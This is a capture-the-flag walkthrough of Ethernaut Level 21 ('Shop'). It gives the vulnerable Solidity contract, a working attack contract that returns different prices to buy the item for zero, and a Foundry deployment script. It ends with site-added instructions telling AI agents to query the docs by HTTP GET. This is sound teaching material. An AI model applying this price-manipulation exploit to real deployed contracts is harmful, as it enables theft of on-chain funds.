# Level 21 - Shop ⏺⏺ {% embed url="" %} ### Level Setup {% hint style="info" %} Сan you get the item from the shop for less than the price asked? **Things that might help:** * `Shop` expects to be used from a `Buyer` * Understanding restrictions of view functions {% endhint %} ### Level Contract {% embed url="" %} {% code lineNumbers="true" fullWidth="false" %} ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; interface Buyer { function price() external view returns (uint256); } contract Shop { uint256 public price = 100; bool public isSold; function buy() public { Buyer _buyer = Buyer(msg.sender); if (_buyer.price() >= price && !isSold) { isSold = true; price = _buyer.price(); } } } ``` {% endcode %} ### Exploit {% tabs %} {% tab title="Anvil" %} ```bash make anvil-exploit-level-21 ``` {% endtab %} {% tab title="Holesky" %} ```bash make holesky-exploit-level-21 ``` {% endtab %} {% endtabs %} {% tabs %} {% tab title="Exploit Contract" %} {% embed url="" %} {% code title="src/Level21.sol" %} ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; // ================================================================ // │ LEVEL 21 - SHOP │ // ================================================================ interface IShop { function buy() external; function isSold() external view returns (bool); function price() external view returns (uint256); } contract AttackContract { function price() public view returns (uint256) { bool isSold = IShop(msg.sender).isSold(); uint256 askedPrice = IShop(msg.sender).price(); if (!isSold) { return askedPrice; } else { return 0; } } function buyFromShop(address _shopAddr) public { IShop(_shopAddr).buy(); } } ``` {% endcode %} {% endtab %} {% tab title="Exploit Deployment Script" %} {% embed url="" %} {% code title="script/Level21.s.sol" %} ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import {Script, console} from "forge-std/Script.sol"; import {HelperFunctions} from "script/HelperFunctions.s.sol"; import {AttackContract} from "src/Level21.sol"; // ================================================================ // │ LEVEL 21 - SHOP │ // ================================================================ contract Exploit is Script, HelperFunctions { function run() public { address targetContractAddress = getInstanceAddress(); vm.startBroadcast(); AttackContract attackContract = new AttackContract(); attackContract.buyFromShop(targetContractAddress); vm.stopBroadcast(); } } ``` {% endcode %} {% endtab %} {% endtabs %} Submit instance... 🥳 ### Completion Message {% hint style="info" %} Contracts can manipulate data seen by other contracts in any way they want. It's unsafe to change the state based on external and untrusted contracts logic. {% endhint %} ### Notes {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.eridian.xyz/ethereum-dev/defi-challenges/ethernaut/level-21-shop.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.